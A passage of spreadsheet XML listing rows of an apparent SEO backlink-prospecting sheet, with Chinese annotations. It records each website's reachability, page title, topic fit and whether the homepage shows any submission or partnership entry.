      <x:c r="O181" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P181" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q181" s="21" t="str">
        <x:v>Community Military Partnership – Home of Easy360 and American News Network Skip to content Home Town Hero Partners Brands • American News Network • Complete 360 Exciting Update! We're Now Home Town Hero Partners Home Town Hero Partners is launching an exciting new chapter centered on supporting the people who make our communities strong — from veterans and everyday community heroes to the local causes that keep our hometowns thriving. Giving back and creating positive community impact is at the heart of what we do. At the same time, we remain deeply committed to helping small businesses grow and succeed, because strong local businesses are a big part of strong communities. You’ll continue to</x:v>
      </x:c>
      <x:c r="R181" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S181" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T181" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://cmpusa.org</x:v>
      </x:c>
    </x:row>
    <x:row r="182">
      <x:c r="A182" s="18" t="str">
        <x:v>181</x:v>
      </x:c>
      <x:c r="B182" s="19" t="str">
        <x:v>gentle-parent.com</x:v>
      </x:c>
      <x:c r="C182" s="19" t="str">
        <x:v>https://gentle-parent.com</x:v>
      </x:c>
      <x:c r="D182" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E182" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F182" s="20"/>
      <x:c r="G182" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H182" s="19" t="str"/>
      <x:c r="I182" s="19" t="str"/>
      <x:c r="J182" s="19" t="str">
        <x:v>可能相关站点</x:v>
      </x:c>
      <x:c r="K182" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L182" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M182" s="19" t="str">
        <x:v>https://gentle-parent.com</x:v>
      </x:c>
      <x:c r="N182" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O182" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P182" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q182" s="21" t="str"/>
      <x:c r="R182" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S182" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T182" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://gentle-parent.com
http://gentle-parent.com</x:v>
      </x:c>
    </x:row>
    <x:row r="183">
      <x:c r="A183" s="18" t="str">
        <x:v>182</x:v>
      </x:c>
      <x:c r="B183" s="19" t="str">
        <x:v>richter-ahland.com</x:v>
      </x:c>
      <x:c r="C183" s="19" t="str">
        <x:v>https://richter-ahland.com</x:v>
      </x:c>
      <x:c r="D183" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E183" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F183" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G183" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H183" s="19" t="str">
        <x:v>http://richter-ahland.com/</x:v>
      </x:c>
      <x:c r="I183" s="19" t="str">
        <x:v>検索 - Microsoft Bing</x:v>
      </x:c>
      <x:c r="J183" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K183" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L183" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M183" s="19" t="str">
        <x:v>http://richter-ahland.com/</x:v>
      </x:c>
      <x:c r="N183" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O183" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P183" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q183"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183" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S183" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T183" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://richter-ahland.com
http://richter-ahland.com</x:v>
      </x:c>
    </x:row>
    <x:row r="184">
      <x:c r="A184" s="18" t="str">
        <x:v>183</x:v>
      </x:c>
      <x:c r="B184" s="19" t="str">
        <x:v>globuya.com</x:v>
      </x:c>
      <x:c r="C184" s="19" t="str">
        <x:v>https://globuya.com</x:v>
      </x:c>
      <x:c r="D184" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E184" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F184" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G184" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H184" s="19" t="str">
        <x:v>https://globuya.com/</x:v>
      </x:c>
      <x:c r="I184" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J184" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K184" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L184" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M184" s="19" t="str">
        <x:v>https://globuya.com/</x:v>
      </x:c>
      <x:c r="N184" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O184" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P184" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q184" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R184" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S184" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T184" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://globuya.com</x:v>
      </x:c>
    </x:row>
    <x:row r="185">
      <x:c r="A185" s="18" t="str">
        <x:v>184</x:v>
      </x:c>
      <x:c r="B185" s="19" t="str">
        <x:v>accountedforyou.com.au</x:v>
      </x:c>
      <x:c r="C185" s="19" t="str">
        <x:v>https://accountedforyou.com.au</x:v>
      </x:c>
      <x:c r="D185" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E185" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F185" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G185" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H185" s="19" t="str">
        <x:v>https://accountedforyou.com.au/</x:v>
      </x:c>
      <x:c r="I185" s="19" t="str">
        <x:v>Xero Bookkeeper for Small Businesses | Accounted For You</x:v>
      </x:c>
      <x:c r="J185" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K185" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L185" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M185" s="19" t="str">
        <x:v>https://accountedforyou.com.au/</x:v>
      </x:c>
      <x:c r="N185" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O185" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P185" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q185" s="21" t="str">
        <x:v>Accounted For You help female-led small businesses and e-commerce brands to flourish through bespoke bookkeeping services &amp; resources Xero Bookkeeper for Small Businesses | Accounted For You Skip to content Home work with us Bookkeeping Full Service Essentials AFY Client Portal learn with us Blog Resources Learning Hub podcast Contact Contact Us About AFY As seen in book a call we’re certified Xero bookkeepers helping female-led businesses to flourish is bas making you batty? does payroll make your heart pound? do finances make you say four letter words? Take a deep breath and put the calculator down, we’ve got you! love to learn more? This way Meet Lisa I’m your plant-loving, number-crunching, small-business cheerleader, aka Bookkeeper and Director of Accounted For You If you’re sick of reconciling a shoebox full of recei</x:v>
      </x:c>
      <x:c r="R185" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S185" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T185" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://accountedforyou.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="186">
      <x:c r="A186" s="18" t="str">
        <x:v>185</x:v>
      </x:c>
      <x:c r="B186" s="19" t="str">
        <x:v>expert-bremerhaven.com</x:v>
      </x:c>
      <x:c r="C186" s="19" t="str">
        <x:v>https://expert-bremerhaven.com</x:v>
      </x:c>
      <x:c r="D186" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E186" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F186" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G186" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H186" s="19" t="str">
        <x:v>http://expert-bremerhaven.com/</x:v>
      </x:c>
      <x:c r="I186" s="19" t="str">
        <x:v>WordPress &amp;rsaquo; Fehler</x:v>
      </x:c>
      <x:c r="J186" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K186" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L186" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M186" s="19" t="str">
        <x:v>http://expert-bremerhaven.com/</x:v>
      </x:c>
      <x:c r="N186" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O186" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P186" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q186" s="21" t="str">
        <x:v>WordPress &amp;rsaquo; Fehler Es gab einen kritischen Fehler auf deiner Website. Erfahre mehr über die Problembehandlung in WordPress.</x:v>
      </x:c>
      <x:c r="R186" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S186" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T186" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://expert-bremerhaven.com
http://expert-bremerhaven.com</x:v>
      </x:c>
    </x:row>
    <x:row r="187">
      <x:c r="A187" s="18" t="str">
        <x:v>186</x:v>
      </x:c>
      <x:c r="B187" s="19" t="str">
        <x:v>educhildcare.com.au</x:v>
      </x:c>
      <x:c r="C187" s="19" t="str">
        <x:v>https://educhildcare.com.au</x:v>
      </x:c>
      <x:c r="D187" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E187" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F187" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G187" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H187" s="19" t="str">
        <x:v>https://www.educhildcare.com.au/</x:v>
      </x:c>
      <x:c r="I187" s="19" t="str">
        <x:v>Sydney Early Education Centres</x:v>
      </x:c>
      <x:c r="J187" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K187" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L187" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M187" s="19" t="str">
        <x:v>https://www.educhildcare.com.au/</x:v>
      </x:c>
      <x:c r="N187" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O187" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P187" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q187" s="21" t="str">
        <x:v>Sydney Early Education Centres has a commitment to provide exemplary early childhood care and education for each child entrusted in our care. Sydney Early Education Centres Skip to content About Our Values Our Curriculum Our Team of Leaders Our Environments Our Child Safe Commitment our Centres Cheltenham Early Education Centre – Tallowwood Place Cheltenham Early Education Centre – Magnolia House Northmead Early Education Centre Westmead Early Education Centre Playgroup Learning for Life Westmead Careers Blog Contact Join Waitlist Book a Tour Enquire Now Our Locations Sydney Early Education Centres Your place to belong, learn, and grow since 1997 Where respect, learning, and excellence meet At Sydney Early Education Centres, we believe that children are young citizens deserving of respect and understanding. We foster an environmen</x:v>
      </x:c>
      <x:c r="R187" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S187" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T187" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://educhildcare.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="188">
      <x:c r="A188" s="18" t="str">
        <x:v>187</x:v>
      </x:c>
      <x:c r="B188" s="19" t="str">
        <x:v>mzaxazm.com</x:v>
      </x:c>
      <x:c r="C188" s="19" t="str">
        <x:v>https://mzaxazm.com</x:v>
      </x:c>
      <x:c r="D188" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E188" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F188" s="20"/>
      <x:c r="G188" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H188" s="19" t="str"/>
      <x:c r="I188" s="19" t="str"/>
      <x:c r="J188" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K188" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L188" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M188" s="19" t="str">
        <x:v>https://mzaxazm.com</x:v>
      </x:c>
      <x:c r="N188" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O188" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P188" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q188" s="21" t="str"/>
      <x:c r="R188" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S188" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T188" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://mzaxazm.com
http://mzaxazm.com</x:v>
      </x:c>
    </x:row>
    <x:row r="189">
      <x:c r="A189" s="18" t="str">
        <x:v>188</x:v>
      </x:c>
      <x:c r="B189" s="19" t="str">
        <x:v>teachersconnect.co</x:v>
      </x:c>
      <x:c r="C189" s="19" t="str">
        <x:v>https://teachersconnect.co</x:v>
      </x:c>
      <x:c r="D189" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E189" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F189" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G189" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H189" s="19" t="str">
        <x:v>https://teachersconnect.co/</x:v>
      </x:c>
      <x:c r="I189" s="19" t="str">
        <x:v>teachersconnect.co</x:v>
      </x:c>
      <x:c r="J189" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K189" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L189" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M189" s="19" t="str">
        <x:v>https://teachersconnect.co/</x:v>
      </x:c>
      <x:c r="N189" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O189" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P189" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q189" s="21" t="str">
        <x:v>Find information, resources and relevant links for teachersconnect.co. This domain may be for sale. teachersconnect.co teachersconnect.co Find information, resources and relevant links for teachersconnect.co. This domain may be for sale. Terms of Service | Privacy Policy</x:v>
      </x:c>
      <x:c r="R189" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S189" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T189" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://teachersconnect.co</x:v>
      </x:c>
    </x:row>
    <x:row r="190">
      <x:c r="A190" s="18" t="str">
        <x:v>189</x:v>
      </x:c>
      <x:c r="B190" s="19" t="str">
        <x:v>makecalmlovely.com</x:v>
      </x:c>
      <x:c r="C190" s="19" t="str">
        <x:v>https://makecalmlovely.com</x:v>
      </x:c>
      <x:c r="D190" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E190" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F190" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G190" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H190" s="19" t="str">
        <x:v>https://makecalmlovely.com/</x:v>
      </x:c>
      <x:c r="I190" s="19" t="str">
        <x:v>Home - Make Calm Lovely</x:v>
      </x:c>
      <x:c r="J190" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K190" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L190" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M190" s="19" t="str">
        <x:v>https://makecalmlovely.com/</x:v>
      </x:c>
      <x:c r="N190" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O190" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P190" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q190" s="21" t="str">
        <x:v>Home - Make Calm Lovely Skip to content Make your life lovelier with Make Calm Lovely!! IKEA HACKS Home IKEA HACKS DIY &amp; CRAFTS About Contact Privacy Policy Mediavine Privacy Policy California Consumer Privacy Act (CCPA) Policy Our Cookie Policy Search for: FREE RECIPE EBOOK! Get your copy! &gt; Make Calm Lovely Inspiring Women to Design, DIY, and Delight in Home Decor DIY ORGANIZING | IKEA HACKS | ROUND-UPS IKEA organizing hacks for your home IKEA HACKS | IKEA MUST HAVES IKEA Items that designers rave about IKEA HACKS Best IKEA Make Up Storage Ideas DIY &amp; CRAFTS DIY Housewarming Gift Ideas Top 10 Favorites How to make DIY Macrame Keychains (Perfect for Beginners!) IKEA Brimnes Hacks DIY Projec</x:v>
      </x:c>
      <x:c r="R190" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S190" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T190" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://makecalmlovely.com</x:v>
      </x:c>
    </x:row>
    <x:row r="191">
      <x:c r="A191" s="18" t="str">
        <x:v>190</x:v>
      </x:c>
      <x:c r="B191" s="19" t="str">
        <x:v>machinery.world</x:v>
      </x:c>
      <x:c r="C191" s="19" t="str">
        <x:v>https://machinery.world</x:v>
      </x:c>
      <x:c r="D191" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E191" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F191" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G191" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H191" s="19" t="str">
        <x:v>https://machinery.world/</x:v>
      </x:c>
      <x:c r="I191" s="19" t="str"/>
      <x:c r="J191" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K191" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L191" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M191" s="19" t="str">
        <x:v>https://machinery.world/</x:v>
      </x:c>
      <x:c r="N191" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O191" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P191" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q191" s="21" t="str">
        <x:v>Machinery.World Latest News Latest Issue About Advertising Circulation Media Pack Privacy Policy Terms &amp; Conditions Contact Us New Products Events Auctions Subscriptions Directory Associations Auctioneers Auctions &amp; Valuations Alignment Tools Barreling / Super Finishing Boring Heads / Tapping Heads Broaching / Key Way Cutting CNC / CRT Screen repairs and replacements CNC Grinding CNC Machine Tools Spares and Service / Repairs CNC Programming &amp; Training CNC Retrofitting CNC Vertical Boring Coil Processing Equipment Computerised Production Equipment Crankshafts Deep Hole Boring Deep Hole Drilling Digital Readouts Finance For Machinery Fully Automated Production Gear Cutting Grinding Grinding C</x:v>
      </x:c>
      <x:c r="R191" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S191" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T191" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://machinery.world</x:v>
      </x:c>
    </x:row>
    <x:row r="192">
      <x:c r="A192" s="18" t="str">
        <x:v>191</x:v>
      </x:c>
      <x:c r="B192" s="19" t="str">
        <x:v>woofsofwimbledon.com</x:v>
      </x:c>
      <x:c r="C192" s="19" t="str">
        <x:v>https://woofsofwimbledon.com</x:v>
      </x:c>
      <x:c r="D192" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E192" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F192" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G192" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H192" s="19" t="str">
        <x:v>https://www.woofsofwimbledon.com/</x:v>
      </x:c>
      <x:c r="I192" s="19" t="str">
        <x:v>Woofs of Wimbledon Dog Walker – Let's go on an adventure</x:v>
      </x:c>
      <x:c r="J192" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K192" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L192" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M192" s="19" t="str">
        <x:v>https://www.woofsofwimbledon.com/</x:v>
      </x:c>
      <x:c r="N192" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O192" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P192" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q192" s="21" t="str">
        <x:v>Woofs of Wimbledon Dog Walker – Let's go on an adventure Skip to content Home Training About Us Services/Prices Blog Testimonials Dorking Walkies Contact Contact About Us Blog Contact Us Dorking Walkies Home Links Privacy Policy Services Testimonials The Story of Jeani and Monkey Training Welcome to Woofs of Wimbledon Dog Walker Call us: 07703 817171 Looking for a reliable and experienced dog walker in Wimbledon or Dorking area? Look no further! Explore Now Hi, we are Woofs of Wimbledon Dog Walker We are experienced dog walkers and trainers, who can’t wait to meet you and your furry friend! Exciting News! We’re delighted to introduce new walking options in the Dorking area! We are based in t</x:v>
      </x:c>
      <x:c r="R192" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S192" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T192" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://woofsofwimbledon.com</x:v>
      </x:c>
    </x:row>
    <x:row r="193">
      <x:c r="A193" s="18" t="str">
        <x:v>192</x:v>
      </x:c>
      <x:c r="B193" s="19" t="str">
        <x:v>keeptoddlersbusy.com</x:v>
      </x:c>
      <x:c r="C193" s="19" t="str">
        <x:v>https://keeptoddlersbusy.com</x:v>
      </x:c>
      <x:c r="D193" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E193" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F193" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G193" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H193" s="19" t="str">
        <x:v>https://keeptoddlersbusy.com/</x:v>
      </x:c>
      <x:c r="I193" s="19" t="str">
        <x:v>Keep Toddlers Busy- Loving Life With Fun, Balance &amp; Learning</x:v>
      </x:c>
      <x:c r="J193" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K193" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L193" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M193" s="19" t="str">
        <x:v>https://keeptoddlersbusy.com/</x:v>
      </x:c>
      <x:c r="N193" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O193" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P193" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q193" s="21" t="str">
        <x:v>Keep Toddlers Busy helps parents create fun activities and crafts for kids of all ages and provides tips, reviews, and kid's home and decor inspiration. Keep Toddlers Busy- Loving Life With Fun, Balance &amp; Learning Home Free Activities Planner Shops Apparel Gift Guides ShopAmazon My Story Loving Life with Fun, Balance, and Learning Activities Baby Activities Fun Activites PreschoolActivities Arts and Crafts Holiday Crafts&amp;Fun Early Learning Sensory Learning Fine Motor Learning Cognitive Learning For Moms ONLY Self-Care Fashion Gift Guides For Mom Tips Reviews Product Reviews Kid’s Home Popular Posts Activities Baby Activities Fun Activites PreschoolActivities Arts and Crafts Holiday Crafts&amp;Fun Early Learning Sensory Learning Fine Motor Learning Cognitive Learning For Moms ONLY Self-Care Fashion Gift Guides For Mom Tips Reviews Product Reviews</x:v>
      </x:c>
      <x:c r="R193" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S193" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T193" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://keeptoddlersbusy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="194">
      <x:c r="A194" s="18" t="str">
        <x:v>193</x:v>
      </x:c>
      <x:c r="B194" s="19" t="str">
        <x:v>sonningcommonprimary.co.uk</x:v>
      </x:c>
      <x:c r="C194" s="19" t="str">
        <x:v>https://sonningcommonprimary.co.uk</x:v>
      </x:c>
      <x:c r="D194" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E194" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F194" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G194" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H194" s="19" t="str">
        <x:v>https://sonningcommonprimary.co.uk/</x:v>
      </x:c>
      <x:c r="I194" s="19" t="str">
        <x:v>SCPS | Homepage</x:v>
      </x:c>
      <x:c r="J194" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K194" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L194" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M194" s="19" t="str">
        <x:v>https://sonningcommonprimary.co.uk/</x:v>
      </x:c>
      <x:c r="N194" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O194" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P194" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q194" s="21" t="str">
        <x:v>If your child is due to start school in September 2027, contact us for a personal tour, we look forward to the opportunity to show you why we are so p SCPS | Homepage Sonning Common Primary School Space to learn, grow and be inspired Home Our School Admissions Assessment Results, Ofsted &amp; Financial Information Curriculum Governors OPaL Our Charities Our Vision Policies Relationships Education (RSE) Photos of our school Safeguarding and Child Protection Staff Sustainability Vacancies Parents Attendance Breakfast and After School Clubs Calendar Clubs and activities ECO Council Email updates Financial Support Internet Safety Kites Kitchen More About our School My Child At School (MCAS) PTA Resources for Parents/Carers School Uniform SC Swim School The School Day Weekly Newsletters School Life Kites (Reception) Year One Year Two Year Three Yea</x:v>
      </x:c>
      <x:c r="R194" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S194" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T194" s="21" t="str">
